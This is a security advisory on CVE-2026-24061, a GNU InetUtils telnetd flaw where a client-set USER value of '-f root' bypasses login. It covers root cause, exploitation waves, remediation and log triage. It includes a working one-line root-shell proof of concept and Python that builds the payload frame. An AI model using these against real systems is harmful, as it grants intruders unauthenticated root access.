CVE-2026-24061 — GNU InetUtils Argument Injection Vulnerability


GNU InetUtils telnetd — 11-year-old USER variable injection grants instant unauthenticated root shell

What is GNU InetUtils?

GNU InetUtils is the GNU Project's suite of common networking utilities, shipped as a standard package in nearly every Linux distribution. It provides implementations of classic network tools and services including telnetd (Telnet server), ftpd, rlogind, rshd, tftpd, ping, traceroute, and others. The telnetd component — the Telnet remote access server — is the affected component in this vulnerability. While Telnet has largely been superseded by SSH in modern enterprise environments, telnetd from GNU InetUtils remains widely deployed in legacy Linux infrastructure, embedded devices, industrial control systems (ICS/OT), routers, and network appliances that predate or cannot run SSH.

Shodan identified over 214,000 internet-exposed Telnet services at the time exploitation began in January 2026, with the heaviest concentrations in China, Brazil, Canada, Argentina, and the United States. Because InetUtils is a GNU base package, affected deployments span virtually every Linux distribution and a large ecosystem of embedded Linux devices.

Overview

CVE-2026-24061 is a CWE-88 (Argument Injection) vulnerability in GNU InetUtils telnetd. The flaw was introduced in March 2015 and went undetected for approximately 11 years across all versions from 1.9.3 through 2.7. Exploitation is trivially simple: an attacker sets the USER environment variable to the string -f root during Telnet connection negotiation using the protocol's standard NEW_ENVIRON option. The telnetd process passes this value unsanitized into a command invocation of /usr/bin/login, and the -f flag tells login to bypass authentication entirely and grant an immediate shell as the named user (root). No credentials, no prior foothold, and no interaction are required — a single Telnet connection delivers an interactive root shell.

Active exploitation began January 22, 2026, one day after CVE publication. CISA added the vulnerability to the KEV catalog on January 26, 2026. TXOne Networks observed three distinct attack wave patterns targeting the flaw, with source IPs distributed across 52 addresses in 16 countries, suggesting coordinated mass-exploitation campaigns. The vulnerability is particularly significant for OT/ICS environments where Telnet is still commonly used on embedded and legacy devices that cannot easily be upgraded.

Affected Versions

Component: GNU InetUtils telnetd
  Vulnerable: 1.9.3 through 2.7 (all releases from 2015)
  Fixed: 2.7-2 or later

Component: Distributions shipping inetutils-telnetd
  Vulnerable: check distribution advisories
  Fixed: apply distribution-specific backport patches

Distribution maintainers for Debian, Ubuntu, Red Hat, SUSE, Alpine, and others have released backport patches for supported releases that may still ship versions in the vulnerable range. Check the relevant distribution security advisories for package-specific fixed versions.

Technical Details

The root cause is unsafe string interpolation of a client-controlled environment variable into a login command. In the vulnerable versions of GNU InetUtils telnetd, the login command template includes a %U placeholder that is replaced with the USER environment variable:

case 'U': return getenv("USER");

This value is taken directly from the Telnet NEW_ENVIRON option negotiated during connection setup, which the client fully controls. No validation, sanitization, or argument-boundary enforcement is applied before inserting the value into the command line passed to /usr/bin/login.
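The NEW_ENVIRON exchange that delivers the USER value, as an added example in Python (this is illustration code, not GNU InetUtils' own implementation). It builds the bytes each side sends under RFC 1572, decodes the client's reply the way a server must, and shows that the string telnetd later reads with getenv("USER") is chosen byte-for-byte by the client. All function names are hypothetical.

```python
"""Telnet NEW-ENVIRON (RFC 1572) exchange carrying the USER variable.

Added illustration, not code from GNU InetUtils. Builds the bytes each side
sends and decodes the client's reply the way a server must, to show that the
USER string telnetd later reads with getenv("USER") is chosen byte-for-byte
by the client. Function names are hypothetical.
"""

IAC, SB, SE, WILL, DO = 255, 250, 240, 251, 253   # Telnet command bytes
NEW_ENVIRON = 39                                  # option code (RFC 1572)
IS, SEND = 0, 1                                   # subnegotiation verbs
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3             # field markers inside IS/SEND


def server_request_environment() -> bytes:
    """Server side: offer the option, then ask the client for all variables."""
    return bytes([IAC, DO, NEW_ENVIRON, IAC, SB, NEW_ENVIRON, SEND, IAC, SE])


def _escape(data: bytes) -> bytes:
    """RFC 1572 escaping: IAC is doubled; VAR/VALUE/ESC/USERVAR bytes get an ESC prefix."""
    out = bytearray()
    for b in data:
        if b == IAC:
            out += bytes([IAC, IAC])
        elif b in (VAR, VALUE, ESC, USERVAR):
            out += bytes([ESC, b])
        else:
            out.append(b)
    return bytes(out)


def client_send_environment(variables: dict) -> bytes:
    """Client side: WILL NEW-ENVIRON, then IS VAR name VALUE value ... IAC SE.

    A telnet client's -a option fills `variables` from the USER environment
    variable; an attacker's client can put any bytes here.
    """
    body = bytearray([IS])
    for name, value in variables.items():
        body += bytes([VAR]) + _escape(name.encode("latin-1"))
        body += bytes([VALUE]) + _escape(value.encode("latin-1"))
    return bytes([IAC, WILL, NEW_ENVIRON, IAC, SB, NEW_ENVIRON]) + bytes(body) + bytes([IAC, SE])


def parse_environment(frame: bytes) -> dict:
    """Server side: decode the client's IS subnegotiation into {name: value}."""
    i = frame.index(bytes([IAC, SB, NEW_ENVIRON, IS])) + 4
    pairs, field = [], 0
    while True:
        b = frame[i]
        if b == IAC:
            i += 1
            if frame[i] == SE:             # unescaped IAC SE ends the subnegotiation
                break
            pairs[-1][field].append(IAC)   # IAC IAC is a literal 0xFF inside a value
        elif b in (VAR, USERVAR):
            pairs.append([bytearray(), bytearray()])
            field = 0                      # following bytes are the variable name
        elif b == VALUE:
            field = 1                      # following bytes are the value
        else:
            if b == ESC:                   # ESC x is the literal byte x
                i += 1
                b = frame[i]
            pairs[-1][field].append(b)
        i += 1
    return {name.decode("latin-1"): value.decode("latin-1") for name, value in pairs}


def user_from_client_reply(frame: bytes) -> str:
    """What telnetd ends up exporting as USER for the login command."""
    return parse_environment(frame).get("USER", "")


if __name__ == "__main__":
    print(server_request_environment().hex(" "))
    attack = client_send_environment({"USER": "-f root", "TERM": "xterm"})
    print(attack.hex(" "))
    print(repr(user_from_client_reply(attack)))
```

A network monitor in front of a Telnet-only segment can apply the same decode to inbound traffic and alert when the USER value begins with a hyphen or contains whitespace; nothing in the option itself constrains the value, so the constraint has to be imposed by the server or by the monitor.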

The attack exploits the fact that /usr/bin/login accepts a -f username flag meaning "skip authentication and log in as this user." telnetd expands the template into a single string and then splits that string into separate arguments for login, so a USER value of -f root arrives as two arguments rather than as one odd-looking username. Setting USER to -f root therefore causes telnetd to construct the following command:

/usr/bin/login -h <hostname> -f root

login parses -f as a command-line option (not as part of a username), skips authentication, and starts an interactive shell as root. A single-line proof-of-concept uses a telnet client that supports automatic login; the -a flag makes the client send its USER environment variable through NEW_ENVIRON:

USER='-f root' telnet -a <target-ip>

The attack requires:

  • A reachable telnetd listening on the target (default port 23)
  • No prior credentials, authentication, or foothold
  • The underlying /usr/bin/login binary to support the -f flag (standard on Linux: both the util-linux and shadow-utils implementations of login accept it)

The fix introduces a sanitization function in telnetd that rejects USER values beginning with a hyphen or containing shell metacharacters before constructing the login command.
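A model of the vulnerable command construction next to a check shaped like the fix described above, as an added example in Python (not GNU InetUtils' C code). It reproduces the behaviour the advisory describes (a template whose %U is replaced by the client-supplied USER, then split on whitespace into argv) and rejects a USER that begins with a hyphen or contains shell metacharacters. The template string, the metacharacter set and every function name are assumptions made for the illustration; in particular whitespace is in the reject set because the split is what manufactures the extra argv entry.

```python
"""Model of the login-command construction and the sanitizing fix.

Added example in Python, not GNU InetUtils' C code. It reproduces the
behaviour described in the advisory (a template whose %U is replaced by the
client-supplied USER, then split on whitespace into argv) and sets beside it
a check shaped like the fix description: reject a USER that begins with '-'
or contains shell metacharacters. The template string, the metacharacter set
and all names are assumptions made for the illustration.
"""
from typing import List, Optional

# Assumed template shape; matches the command line shown in the advisory.
LOGIN_TEMPLATE = "/usr/bin/login -h %h %U"

# Assumed reject set. Whitespace is included deliberately: the split on
# whitespace is what turns one USER value into extra argv entries.
SHELL_META = set(" \t\n;&|<>`$(){}[]!*?\"'\\")


def expand_login_argv(template: str, hostname: str, user: str) -> List[str]:
    """Vulnerable construction: substitute %h/%U, then split on whitespace."""
    cmdline = template.replace("%h", hostname).replace("%U", user)
    return cmdline.split()


def argv_skips_authentication(argv: List[str]) -> bool:
    """True when login would see -f as an option (authentication bypassed)."""
    return "-f" in argv[1:]


def user_is_safe(user: str) -> bool:
    """Fix-shaped check: non-empty, no leading hyphen, no metacharacters."""
    if not user or user.startswith("-"):
        return False
    return not any(c in SHELL_META for c in user)


def login_argv(template: str, hostname: str, user: str,
               hardened: bool = True) -> Optional[List[str]]:
    """Hardened path returns None for a rejected USER instead of building argv."""
    if hardened and not user_is_safe(user):
        return None
    return expand_login_argv(template, hostname, user)


if __name__ == "__main__":
    for user in ("alice", "-f root", "alice -f root"):
        before = expand_login_argv(LOGIN_TEMPLATE, "203.0.113.5", user)
        after = login_argv(LOGIN_TEMPLATE, "203.0.113.5", user)
        print(f"{user!r:16} vulnerable argv={before} "
              f"bypass={argv_skips_authentication(before)} hardened={after}")
```

The third sample value, alice -f root, is the reason a leading-hyphen check alone would be insufficient: it passes the hyphen test yet still lands -f in argv once the string is split, so any fix must also refuse whitespace (or stop splitting client-supplied text at all).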

Discovery

The specific individual or organization credited with discovering and reporting CVE-2026-24061 has not been publicly named in the vendor fix commits or CISA catalog entry. The CVE was published January 21, 2026, and the GNU InetUtils maintainers released two fix commits to the Codeberg repository (ccba9f7 and fd702c0) addressing the issue. The flaw itself was introduced via a source code change committed in March 2015 and persisted undetected through approximately 11 years of releases.

Exploitation Context

Exploitation in the wild began January 22, 2026, one day after CVE publication. TXOne Networks' threat telemetry documented three distinct operational patterns across 52 source IPs in 16 countries:

  1. Probe-only: Attackers testing for the vulnerability without immediately executing a payload.
  2. Inline command execution: Direct OS command execution delivered in the same session as the authentication bypass.
  3. Downloader stagers: Commands that use curl or wget (with fallback) to fetch and execute secondary payloads.

The geographic distribution and volume of activity suggest automated, coordinated mass-exploitation rather than targeted intrusions by named threat actors. No specific ransomware group or nation-state actor has been publicly attributed to this campaign.

The vulnerability is of particular concern in OT/ICS and embedded device environments, where Telnet is still frequently the only available remote management protocol on legacy equipment. Many such devices cannot be patched, upgraded to SSH, or taken offline without significant operational impact, making network-layer controls especially important.

Remediation

  1. Patch: Upgrade GNU InetUtils telnetd to version 2.7-2 or later, or apply the applicable distribution backport patch for your Linux distribution. Check your distribution's security tracker for the correct package version.
  2. Disable telnetd: If Telnet is not operationally required, disable and remove the inetutils-telnetd package immediately. Telnet transmits all data including credentials in cleartext and should not be running on any internet-connected or multi-tenant system.
  3. Migrate to SSH: Replace any Telnet-dependent workflows with SSH equivalents. For embedded and OT devices that only support Telnet, implement a terminal server or jump host that enforces SSH authentication for access to the Telnet-only device.
  4. Block port 23: Apply firewall rules to block inbound TCP port 23 from untrusted networks. Internet-exposed Telnet services are a well-known attack surface; port 23 should never be open to the internet.
  5. Network segmentation: Devices that cannot be patched or upgraded should be isolated in a separate VLAN or network segment with strict access controls and monitoring. Apply compensating controls such as authentication proxies in front of legacy Telnet endpoints.
  6. Log review: Check system logs for root sessions opened through the login service from external or unexpected hosts. Because login -f skips authentication entirely, such a session leaves no authentication record: on systems using PAM, look for pam_unix(login:session) entries for root with no preceding pam_unix(login:auth) activity for the same login process. Note that pam_unix records authentication failures but, by default, not successes, so the absence of an auth record is a lead to confirm against connection source and timing rather than proof on its own. Review /var/log/auth.log (Debian/Ubuntu) or /var/log/secure (RHEL/CentOS) for Telnet-initiated root sessions.
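A triage script for the log-review step, added here as an example (it is neither from this advisory's source nor from InetUtils). The log lines it scans are constructed in the pam_unix/syslog shape rather than taken from a real incident, and the ROOT LOGIN ON ... FROM ... and LOGIN ON ... BY ... FROM ... lines follow the messages util-linux login emits, which is an assumption about the target's login implementation. The script lists every root session opened by the login service, attaches the remote host when a login line records it, and notes whether any pam_unix(login:auth) record for the same login PID preceded the session open.

```python
"""Triage of auth.log-style lines for root sessions opened via `login`.

Added example; the SAMPLE_AUTH_LOG below is constructed for illustration in
the pam_unix/syslog shape and is not from a real incident. The ROOT LOGIN
ON ... FROM ... and LOGIN ON ... BY ... FROM ... lines assume a util-linux
login. pam_unix logs auth failures but, by default, not successes, so
"no auth record" is a lead to confirm, not proof of a -f bypass.
"""
import re
from typing import Dict, List

SAMPLE_AUTH_LOG = """\
Jan 23 03:14:02 host1 login[2311]: pam_unix(login:session): session opened for user root by LOGIN(uid=0)
Jan 23 03:14:02 host1 login[2311]: ROOT LOGIN ON pts/0 FROM 203.0.113.5
Jan 23 03:20:40 host1 login[2398]: pam_unix(login:auth): authentication failure; logname= uid=0 euid=0 tty=/dev/pts/1 ruser= rhost=198.51.100.7  user=root
Jan 23 03:20:49 host1 login[2398]: pam_unix(login:session): session opened for user root by LOGIN(uid=0)
Jan 23 03:20:49 host1 login[2398]: ROOT LOGIN ON pts/1 FROM 198.51.100.7
Jan 23 04:01:13 host1 login[2450]: pam_unix(login:session): session opened for user alice by LOGIN(uid=0)
Jan 23 04:01:13 host1 login[2450]: LOGIN ON pts/2 BY alice FROM 192.0.2.9
"""

# One syslog line from the login process: timestamp, host, PID, message.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) login\[(?P<pid>\d+)\]: (?P<msg>.*)$")
# Newer pam_unix writes "for user root(uid=0)", so stop the name at "(" too.
SESSION_RE = re.compile(r"pam_unix\(login:session\): session opened for user (?P<user>[^\s(]+)")
AUTH_RE = re.compile(r"pam_unix\(login:auth\)")
FROM_RE = re.compile(r"LOGIN ON \S+ (?:BY \S+ )?FROM (?P<rhost>\S+)")


def sessions_via_login(log_text: str, user: str = "root") -> List[Dict]:
    """Return one finding per `login` session opened for `user`, in log order."""
    auth_seen = set()          # login PIDs that produced any pam_unix(login:auth) record
    open_sessions = {}         # PID -> finding, to attach the FROM host when it appears
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        pid, msg = m["pid"], m["msg"]
        if AUTH_RE.search(msg):
            auth_seen.add(pid)
        sm = SESSION_RE.search(msg)
        if sm and sm["user"] == user:
            finding = {
                "pid": pid,
                "time": m["ts"],
                "rhost": None,
                "auth_record_before_session": pid in auth_seen,
            }
            open_sessions[pid] = finding
            findings.append(finding)
        fm = FROM_RE.search(msg)
        if fm and pid in open_sessions:
            open_sessions[pid]["rhost"] = fm["rhost"]
    return findings


if __name__ == "__main__":
    for f in sessions_via_login(SAMPLE_AUTH_LOG):
        flag = "" if f["auth_record_before_session"] else "  <- no auth record, review"
        print(f"{f['time']} login[{f['pid']}] root session from {f['rhost']}{flag}")
```

Run against a real file, the script is a starting point for scoping: pair each flagged root session's remote host and time with firewall or NetFlow records for inbound TCP/23 to decide whether the session came through telnetd, then look at what the shell did next.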

Key Details

CVE ID: CVE-2026-24061
Vendor / Product: GNU — InetUtils
NVD Published: 2026-01-21
NVD Last Modified: 2026-02-11
CVSS 3.1 Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Severity: CRITICAL
CWE: CWE-88 (Improper Neutralization of Argument Delimiters in a Command, 'Argument Injection')
CISA KEV Added: 2026-01-26
CISA KEV Deadline: 2026-02-16
Known Ransomware Use: No

CVSS 3.1 Breakdown

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Required Action

CISA BOD 22-01 Deadline: 2026-02-16. Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.

Timeline

2015-03-01: Vulnerable %U placeholder introduced in GNU InetUtils telnetd source code
2026-01-21: CVE-2026-24061 published
2026-01-22: Active exploitation begins; three distinct attack waves observed in telemetry
2026-01-26: Added to CISA Known Exploited Vulnerabilities catalog
2026-02-16: CISA BOD 22-01 remediation deadline